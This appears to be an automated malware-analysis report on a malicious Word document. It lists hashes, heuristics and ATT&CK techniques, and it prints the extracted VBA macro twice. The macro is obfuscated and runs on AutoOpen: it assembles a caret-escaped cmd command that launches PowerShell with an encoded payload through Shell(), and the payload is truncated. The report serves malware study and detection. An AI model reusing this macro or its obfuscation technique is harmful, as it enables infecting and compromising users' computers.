Office (OLE) malware analysis — malicious · 6a5cf01bd4902de7

MALICIOUS

Office (OLE)

94.2 KB Created: 2018-06-06 06:39:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: c5391ad890b25646970095a8119106ec SHA-1: 36a204efad9bf6237e8e28d6d9a3a6c0bb9c508c SHA-256: 6a5cf01bd4902de712077cb12b65be654bb86c6cb18c79c368b20b618db76f97

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of potential payload execution. The obfuscated script suggests an attempt to conceal the exact command being run, but the presence of Shell() strongly implies the execution of a secondary malicious component. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malicious documents.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 96,512 bytes but its declared streams total only 35,644 bytes — 60,868 bytes (63%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11375 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11375 bytes
SHA-256: `2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ziuMCubYl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function mPDjjDmk() On Error Resume Next Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK)) JCtSvj = Cos(TEPcE) sdiSR = CDate(nRCfHV) hGGbEL = Cos(wwwEtR) KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK)) dQviZ = Cos(zhduw) DDwim = CDate(ljYETo) TwGIQL = Cos(wnpXHp) mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795) QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM)) UXQNZW = Cos(vVHTLl) alDqnJ = CDate(kUvRaA) mnffhz = Cos(dRfqwJ) End Function Sub Autoopen() On Error Resume Next WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz)) XApAJ = Cos(zWEPY) QOcsi = CDate(Fawjr) zUoujh = Cos(oiBCCw) mPDjjDmk nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW)) khOMaw = Cos(PiUwrH) zbUvoi = CDate(EHfNtj) wwDLV = Cos(MSdHYz) End Sub Attribute VB_Name = "SABYzBjBNF" Function CGrWHtscHf() On Error Resume Next KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB)) pAEfi = Cos(XtUFZ) ljuVnH = CDate(YGRMZ) PBhqGb = Cos(MKUFo) Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " & " nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN)) ZiaMoj = Cos(TivzAh) jkzuqi = CDate(IjwzRK) XnnDDB = Cos(oErwS) jwSRmihv = " %^c^o^m^S^p^E" + "^c^% %" + "^c" + "^o^m^" + "S^p^E^c^% " + "/V " bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR)) jGvYpF = Cos(CiaLPb) jqqYEB = CDate(Zbbvqf) YRZZd = Cos(wzAop) wDsHPqEDcD = " /" + "c " + " set %Zj" + "Rdi" VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml)) tmqCi = Cos(fBcmR) PcPHMA = CDate(NKsSjL) QwOjoY = Cos(IJUbD) NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R" NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR)) TvjJJ = Cos(dMOaiW) Snrco = CDate(wzHzSM) QBKhtK = Cos(ciNqu) atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR" Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj)) zfnaB = Cos(whDDUF) sQlFON = CDate(BDUSSc) fjTtGN = Cos(UDqVu) CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja" LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs)) YMvkUc = Cos(anPbc) tlAwF = CDate(PtYrVN) Ascjv = Cos(wzfhnm) vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!" qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH)) wjBND = Cos(KmzqC) vbiwJ = CDate(ftrET) fNNPU = Cos(usAcz) JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf" WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu)) ivJPT = Cos(jafhvQ) cjkuoP = CDate(RwaamA) mlunj = Cos(zuqXUF) irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&" CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm End Function Function XNbIiwF() On Error Resume Next EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL)) ahpNai = Cos(WoJpCo) pGlHlz = CDate(wIWor) tHnCqM = Cos(bhqmN) bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%" nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw)) XXHPzt = Cos(LSmjq) DSJPl = CDate(hAzzI) MfWlj = Cos(UhpQz) Muibld = "kbPYdHkN" + "rBVmk" + "f%! -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ" bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb)) JRmUj = Cos(iorAwJ) tuAsr = CDate(vlQzqZ) iPWuYP = Cos(fTAsJ) wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAag ... (truncated)

SHA-256: 2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ziuMCubYl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mPDjjDmk()
On Error Resume Next
Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK))
JCtSvj = Cos(TEPcE)
sdiSR = CDate(nRCfHV)
hGGbEL = Cos(wwwEtR)
KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK))
dQviZ = Cos(zhduw)
DDwim = CDate(ljYETo)
TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))
UXQNZW = Cos(vVHTLl)
alDqnJ = CDate(kUvRaA)
mnffhz = Cos(dRfqwJ)
End Function
Sub Autoopen()
On Error Resume Next
WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz))
XApAJ = Cos(zWEPY)
QOcsi = CDate(Fawjr)
zUoujh = Cos(oiBCCw)
mPDjjDmk
nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW))
khOMaw = Cos(PiUwrH)
zbUvoi = CDate(EHfNtj)
wwDLV = Cos(MSdHYz)
End Sub


Attribute VB_Name = "SABYzBjBNF"
Function CGrWHtscHf()
On Error Resume Next
KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB))
pAEfi = Cos(XtUFZ)
ljuVnH = CDate(YGRMZ)
PBhqGb = Cos(MKUFo)
Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " &   "
nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN))
ZiaMoj = Cos(TivzAh)
jkzuqi = CDate(IjwzRK)
XnnDDB = Cos(oErwS)
jwSRmihv = "  %^c^o^m^S^p^E" + "^c^%     %" + "^c" + "^o^m^" + "S^p^E^c^%     " + "/V    "
bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR))
jGvYpF = Cos(CiaLPb)
jqqYEB = CDate(Zbbvqf)
YRZZd = Cos(wzAop)
wDsHPqEDcD = "     /" + "c         " + "  set %Zj" + "Rdi"
VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml))
tmqCi = Cos(fBcmR)
PcPHMA = CDate(NKsSjL)
QwOjoY = Cos(IJUbD)
NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R"
NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR))
TvjJJ = Cos(dMOaiW)
Snrco = CDate(wzHzSM)
QBKhtK = Cos(ciNqu)
atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR"
Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj))
zfnaB = Cos(whDDUF)
sQlFON = CDate(BDUSSc)
fjTtGN = Cos(UDqVu)
CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja"
LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs))
YMvkUc = Cos(anPbc)
tlAwF = CDate(PtYrVN)
Ascjv = Cos(wzfhnm)
vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!"
qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH))
wjBND = Cos(KmzqC)
vbiwJ = CDate(ftrET)
fNNPU = Cos(usAcz)
JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf"
WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu))
ivJPT = Cos(jafhvQ)
cjkuoP = CDate(RwaamA)
mlunj = Cos(zuqXUF)
irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&"
CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm
End Function
Function XNbIiwF()
On Error Resume Next
EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL))
ahpNai = Cos(WoJpCo)
pGlHlz = CDate(wIWor)
tHnCqM = Cos(bhqmN)
bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%"
nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw))
XXHPzt = Cos(LSmjq)
DSJPl = CDate(hAzzI)
MfWlj = Cos(UhpQz)
Muibld = "kbPYdHkN" + "rBVmk" + "f%!  -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ"
bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb))
JRmUj = Cos(iorAwJ)
tuAsr = CDate(vlQzqZ)
iPWuYP = Cos(fTAsJ)
wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAag
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.